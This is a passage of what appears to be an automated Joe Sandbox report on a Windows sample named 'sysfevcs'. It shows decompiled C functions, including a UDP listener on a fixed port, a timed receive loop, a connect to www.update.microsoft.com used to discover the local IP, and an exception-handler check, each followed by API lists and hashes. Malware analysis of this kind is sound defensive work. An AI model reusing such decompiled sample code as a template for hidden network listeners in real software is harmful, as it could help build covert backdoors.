                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t39 = __esi;
                                                                                                                                                                                                                                                                  				_t38 = __edi;
                                                                                                                                                                                                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t31 = E00408820(0x24);
                                                                                                                                                                                                                                                                  					 *_t31 = 0x756470;
                                                                                                                                                                                                                                                                  					 *(_t31 + 4) = 0;
                                                                                                                                                                                                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                                                                                                                                                                                                  					__imp__#23(2, 2, 0x11, _t30);
                                                                                                                                                                                                                                                                  					 *(_t31 + 8) = _t21;
                                                                                                                                                                                                                                                                  					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						E0040DA20(_t31, __edi);
                                                                                                                                                                                                                                                                  						_t31 = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                                                                                                                                                  						L8:
                                                                                                                                                                                                                                                                  						return _t31;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v26 = 0;
                                                                                                                                                                                                                                                                  					_v22 = 0;
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_t24 = _v8;
                                                                                                                                                                                                                                                                  					_v24 = _t24;
                                                                                                                                                                                                                                                                  					_v28 = 2;
                                                                                                                                                                                                                                                                  					__imp__#9(_t39);
                                                                                                                                                                                                                                                                  					_v30 = _t24;
                                                                                                                                                                                                                                                                  					_v33 = 1;
                                                                                                                                                                                                                                                                  					_t25 =  *(_t31 + 8);
                                                                                                                                                                                                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                                                                                                                                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                                                                                                                                                                                                  					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040D7F0, _t31, 0, 0);
                                                                                                                                                                                                                                                                  						goto L8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040DA20(_t31, _t38);
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x0040d5c0
                                                                                                                                                                                                                                                                  0x0040d5c0
                                                                                                                                                                                                                                                                  0x0040d5c8
                                                                                                                                                                                                                                                                  0x0040d6b4
                                                                                                                                                                                                                                                                  0x0040d5d6
                                                                                                                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                                                                                                                  0x0040d5eb
                                                                                                                                                                                                                                                                  0x0040d5f1
                                                                                                                                                                                                                                                                  0x0040d5f8
                                                                                                                                                                                                                                                                  0x0040d604
                                                                                                                                                                                                                                                                  0x0040d607
                                                                                                                                                                                                                                                                  0x0040d60d
                                                                                                                                                                                                                                                                  0x0040d613
                                                                                                                                                                                                                                                                  0x0040d615
                                                                                                                                                                                                                                                                  0x0040d61a
                                                                                                                                                                                                                                                                  0x0040d61a
                                                                                                                                                                                                                                                                  0x0040d61e
                                                                                                                                                                                                                                                                  0x0040d6ae
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d6b0
                                                                                                                                                                                                                                                                  0x0040d626
                                                                                                                                                                                                                                                                  0x0040d62a
                                                                                                                                                                                                                                                                  0x0040d62e
                                                                                                                                                                                                                                                                  0x0040d632
                                                                                                                                                                                                                                                                  0x0040d637
                                                                                                                                                                                                                                                                  0x0040d641
                                                                                                                                                                                                                                                                  0x0040d645
                                                                                                                                                                                                                                                                  0x0040d64a
                                                                                                                                                                                                                                                                  0x0040d659
                                                                                                                                                                                                                                                                  0x0040d65e
                                                                                                                                                                                                                                                                  0x0040d663
                                                                                                                                                                                                                                                                  0x0040d66c
                                                                                                                                                                                                                                                                  0x0040d67d
                                                                                                                                                                                                                                                                  0x0040d686
                                                                                                                                                                                                                                                                  0x0040d6a2
                                                                                                                                                                                                                                                                  0x0040d6ab
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d6ab
                                                                                                                                                                                                                                                                  0x0040d688
                                                                                                                                                                                                                                                                  0x0040d693
                                                                                                                                                                                                                                                                  0x0040d693

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040D5F8
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040D607
                                                                                                                                                                                                                                                                  • htons.WS2_32(00009E34), ref: 0040D64A
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040D66C
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040D67D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: SetEvent.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA3D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: CloseHandle.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA47
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0040D6A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4174406920-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2292cefa0a317ec5c1901b405943e875dcba3fe40e447fbf9e9da0f4f3942521
                                                                                                                                                                                                                                                                  • Instruction ID: 64ad3dadd26626afd739fbfdc7006baf33379391ae681bcd66c450bb3cd6af6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2292cefa0a317ec5c1901b405943e875dcba3fe40e447fbf9e9da0f4f3942521
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821C7B4A44301AFE710DFB48C86B5776A0AF44710F40897DFA48EB2C1D7B9C80C8B6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                                                  			E0040B260(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = _a16;
                                                                                                                                                                                                                                                                  				if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v8 = _a8;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					_t38 = _a4;
                                                                                                                                                                                                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                                                                                                                                                                                                  					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v16 > 0) {
                                                                                                                                                                                                                                                                  						if(_v16 >= _a12) {
                                                                                                                                                                                                                                                                  							_v24 = _a12;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = _v16;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t43 = _a4;
                                                                                                                                                                                                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                                                                                                                                                                                                  						_v20 = _t43;
                                                                                                                                                                                                                                                                  						if(_v20 > 0) {
                                                                                                                                                                                                                                                                  							if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_a12 = _a12 - _v20;
                                                                                                                                                                                                                                                                  							_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(1);
                                                                                                                                                                                                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L15;
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040b269
                                                                                                                                                                                                                                                                  0x0040b270
                                                                                                                                                                                                                                                                  0x0040b27b
                                                                                                                                                                                                                                                                  0x0040b27b
                                                                                                                                                                                                                                                                  0x0040b281
                                                                                                                                                                                                                                                                  0x0040b284
                                                                                                                                                                                                                                                                  0x0040b284
                                                                                                                                                                                                                                                                  0x0040b294
                                                                                                                                                                                                                                                                  0x0040b298
                                                                                                                                                                                                                                                                  0x0040b2a1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b2a9
                                                                                                                                                                                                                                                                  0x0040b2b1
                                                                                                                                                                                                                                                                  0x0040b2be
                                                                                                                                                                                                                                                                  0x0040b2b3
                                                                                                                                                                                                                                                                  0x0040b2b6
                                                                                                                                                                                                                                                                  0x0040b2b6
                                                                                                                                                                                                                                                                  0x0040b2cb
                                                                                                                                                                                                                                                                  0x0040b2cf
                                                                                                                                                                                                                                                                  0x0040b2d5
                                                                                                                                                                                                                                                                  0x0040b2dc
                                                                                                                                                                                                                                                                  0x0040b2e2
                                                                                                                                                                                                                                                                  0x0040b2ed
                                                                                                                                                                                                                                                                  0x0040b2ed
                                                                                                                                                                                                                                                                  0x0040b2f6
                                                                                                                                                                                                                                                                  0x0040b2ff
                                                                                                                                                                                                                                                                  0x0040b2ff
                                                                                                                                                                                                                                                                  0x0040b2dc
                                                                                                                                                                                                                                                                  0x0040b304
                                                                                                                                                                                                                                                                  0x0040b313
                                                                                                                                                                                                                                                                  0x0040b31f
                                                                                                                                                                                                                                                                  0x0040b32b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b313
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B272
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B298
                                                                                                                                                                                                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B2CF
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B2E4
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B304
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B30A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 107502007-0
                                                                                                                                                                                                                                                                  • Opcode ID: 71a43e6b7f37b64d634f912b2060f7a57b042f16722d135749a0119acfb0bbc8
                                                                                                                                                                                                                                                                  • Instruction ID: bff57235f866894c86fcfed964af6ad312f668c5fd324e9b8beac796e9e02ddb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a43e6b7f37b64d634f912b2060f7a57b042f16722d135749a0119acfb0bbc8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34310C74900209DFCB14DFA4D948AAE77B5FF44315F10867AE821A3390C7349A50CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                                                                                                                  			E00409260() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				short _v10;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				char _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				short _v34;
                                                                                                                                                                                                                                                                  				short _v38;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				short _v42;
                                                                                                                                                                                                                                                                  				char _v44;
                                                                                                                                                                                                                                                                  				char _v48;
                                                                                                                                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                                                                                                                                  				char* _t30;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v22 = 0;
                                                                                                                                                                                                                                                                  				_v18 = 0;
                                                                                                                                                                                                                                                                  				_v14 = 0;
                                                                                                                                                                                                                                                                  				_v10 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 2;
                                                                                                                                                                                                                                                                  				__imp__#9(0x50);
                                                                                                                                                                                                                                                                  				_v22 = 0;
                                                                                                                                                                                                                                                                  				_t28 = E00409220("www.update.microsoft.com");
                                                                                                                                                                                                                                                                  				_v20 = _t28;
                                                                                                                                                                                                                                                                  				__imp__#23(2, 1, 0);
                                                                                                                                                                                                                                                                  				_v28 = _t28;
                                                                                                                                                                                                                                                                  				if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_t30 =  &_v24;
                                                                                                                                                                                                                                                                  					__imp__#4(_v28, _t30, 0x10);
                                                                                                                                                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                                                                                                                                                  						_v44 = 0;
                                                                                                                                                                                                                                                                  						_v42 = 0;
                                                                                                                                                                                                                                                                  						_v38 = 0;
                                                                                                                                                                                                                                                                  						_v34 = 0;
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v48 = 0x10;
                                                                                                                                                                                                                                                                  						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                                                                                                                                                                                                  						_v8 = _v40;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00409320(_v28);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x00409266
                                                                                                                                                                                                                                                                  0x0040926f
                                                                                                                                                                                                                                                                  0x00409275
                                                                                                                                                                                                                                                                  0x00409278
                                                                                                                                                                                                                                                                  0x0040927b
                                                                                                                                                                                                                                                                  0x0040927e
                                                                                                                                                                                                                                                                  0x00409287
                                                                                                                                                                                                                                                                  0x0040928d
                                                                                                                                                                                                                                                                  0x00409293
                                                                                                                                                                                                                                                                  0x0040929c
                                                                                                                                                                                                                                                                  0x004092a4
                                                                                                                                                                                                                                                                  0x004092ad
                                                                                                                                                                                                                                                                  0x004092b3
                                                                                                                                                                                                                                                                  0x004092ba
                                                                                                                                                                                                                                                                  0x004092be
                                                                                                                                                                                                                                                                  0x004092c6
                                                                                                                                                                                                                                                                  0x004092ce
                                                                                                                                                                                                                                                                  0x004092d2
                                                                                                                                                                                                                                                                  0x004092d8
                                                                                                                                                                                                                                                                  0x004092db
                                                                                                                                                                                                                                                                  0x004092de
                                                                                                                                                                                                                                                                  0x004092e1
                                                                                                                                                                                                                                                                  0x004092e5
                                                                                                                                                                                                                                                                  0x004092f8
                                                                                                                                                                                                                                                                  0x00409301
                                                                                                                                                                                                                                                                  0x00409301
                                                                                                                                                                                                                                                                  0x00409308
                                                                                                                                                                                                                                                                  0x0040930d
                                                                                                                                                                                                                                                                  0x00409316

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • htons.WS2_32(00000050), ref: 0040928D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409220: inet_addr.WS2_32(004092A1), ref: 0040922A
                                                                                                                                                                                                                                                                    • Part of subcall function 00409220: gethostbyname.WS2_32(?), ref: 0040923D
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004092AD
                                                                                                                                                                                                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004092C6
                                                                                                                                                                                                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 004092F8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • www.update.microsoft.com, xrefs: 00409297
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                                  • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                                  • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                                  • Opcode ID: 66988d6a19ef39c640c2957d28e5451b2ffdae004b209fc3fd48061069894e7e
                                                                                                                                                                                                                                                                  • Instruction ID: a9263f03ec831ac8994e89c93e2ed8b017647d94978a45a17146db47804ae5bd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66988d6a19ef39c640c2957d28e5451b2ffdae004b209fc3fd48061069894e7e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D2129B4E10309ABCB04DFE8D946AEEBBB5AF4C300F10457EE504F3290E2715A44CBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040EC4D(long _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				short* _v32;
                                                                                                                                                                                                                                                                  				void _v36;
                                                                                                                                                                                                                                                                  				void* _t57;
                                                                                                                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                                                                                                                  				signed int _t61;
                                                                                                                                                                                                                                                                  				signed int _t62;
                                                                                                                                                                                                                                                                  				void* _t63;
                                                                                                                                                                                                                                                                  				signed int* _t68;
                                                                                                                                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                                                                                                                  				void* _t76;
                                                                                                                                                                                                                                                                  				signed int _t77;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				void _t80;
                                                                                                                                                                                                                                                                  				signed int _t81;
                                                                                                                                                                                                                                                                  				signed int _t84;
                                                                                                                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                                                                                                                  				short* _t87;
                                                                                                                                                                                                                                                                  				void* _t89;
                                                                                                                                                                                                                                                                  				signed int* _t90;
                                                                                                                                                                                                                                                                  				long _t91;
                                                                                                                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                                                                                                                  				signed int _t94;
                                                                                                                                                                                                                                                                  				signed int _t100;
                                                                                                                                                                                                                                                                  				signed int _t102;
                                                                                                                                                                                                                                                                  				void* _t104;
                                                                                                                                                                                                                                                                  				long _t108;
                                                                                                                                                                                                                                                                  				signed int _t110;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t108 = _a4;
                                                                                                                                                                                                                                                                  				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                                  					L3:
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                                  				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                                  					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_t91 = 0;
                                                                                                                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                                                                                                                  						_a4 = 0;
                                                                                                                                                                                                                                                                  						_t57 = _t76;
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							_t80 =  *_t57;
                                                                                                                                                                                                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                  							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                                  								goto L9;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                                  							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                                  								L20:
                                                                                                                                                                                                                                                                  								_t63 = 0;
                                                                                                                                                                                                                                                                  								L60:
                                                                                                                                                                                                                                                                  								return _t63;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                                  								_t12 =  &_a4;
                                                                                                                                                                                                                                                                  								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                                  								__eflags =  *_t12;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                                  							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                                  							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                                  						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                                  						__eflags = _a4;
                                                                                                                                                                                                                                                                  						if(_a4 == 0) {
                                                                                                                                                                                                                                                                  							L15:
                                                                                                                                                                                                                                                                  							_t81 =  *0x4141f0;
                                                                                                                                                                                                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                                  							_t58 = 0;
                                                                                                                                                                                                                                                                  							__eflags = _t81;
                                                                                                                                                                                                                                                                  							if(_t81 <= 0) {
                                                                                                                                                                                                                                                                  								L18:
                                                                                                                                                                                                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                                  								__eflags = _t61;
                                                                                                                                                                                                                                                                  								if(_t61 < 0) {
                                                                                                                                                                                                                                                                  									_t62 = 0;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_t62 = _a4;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__eflags = _t62;
                                                                                                                                                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                                                                                                                                                  									L59:
                                                                                                                                                                                                                                                                  									_t63 = _t104;
                                                                                                                                                                                                                                                                  									goto L60;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                                  									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                                  										L46:
                                                                                                                                                                                                                                                                  										_t63 = 1;
                                                                                                                                                                                                                                                                  										 *0x414238 = 1;
                                                                                                                                                                                                                                                                  										__eflags =  *0x414238;
                                                                                                                                                                                                                                                                  										if( *0x414238 != 0) {
                                                                                                                                                                                                                                                                  											goto L60;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t84 =  *0x4141f0;
                                                                                                                                                                                                                                                                  										__eflags = _t84;
                                                                                                                                                                                                                                                                  										_t93 = _t84;
                                                                                                                                                                                                                                                                  										if(_t84 <= 0) {
                                                                                                                                                                                                                                                                  											L51:
                                                                                                                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                                                                                                                  											if(_t93 != 0) {
                                                                                                                                                                                                                                                                  												L58:
                                                                                                                                                                                                                                                                  												 *0x414238 = 0;
                                                                                                                                                                                                                                                                  												goto L5;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t77 = 0xf;
                                                                                                                                                                                                                                                                  											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                                  											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                                  												_t77 = _t84;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t94 = 0;
                                                                                                                                                                                                                                                                  											__eflags = _t77;
                                                                                                                                                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                                                                                                                                                  												L56:
                                                                                                                                                                                                                                                                  												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                                  												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                                  													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                                  													__eflags = _t86;
                                                                                                                                                                                                                                                                  													 *0x4141f0 = _t86;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  												goto L58;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												do {
                                                                                                                                                                                                                                                                  													_t68 = 0x4141f8 + _t94 * 4;
                                                                                                                                                                                                                                                                  													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                  													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                                  													 *_t68 = _t110;
                                                                                                                                                                                                                                                                  													_t110 =  *_t68;
                                                                                                                                                                                                                                                                  												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                                  												goto L56;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t69 = 0x4141f4 + _t84 * 4;
                                                                                                                                                                                                                                                                  										while(1) {
                                                                                                                                                                                                                                                                  											__eflags =  *_t69 - _t110;
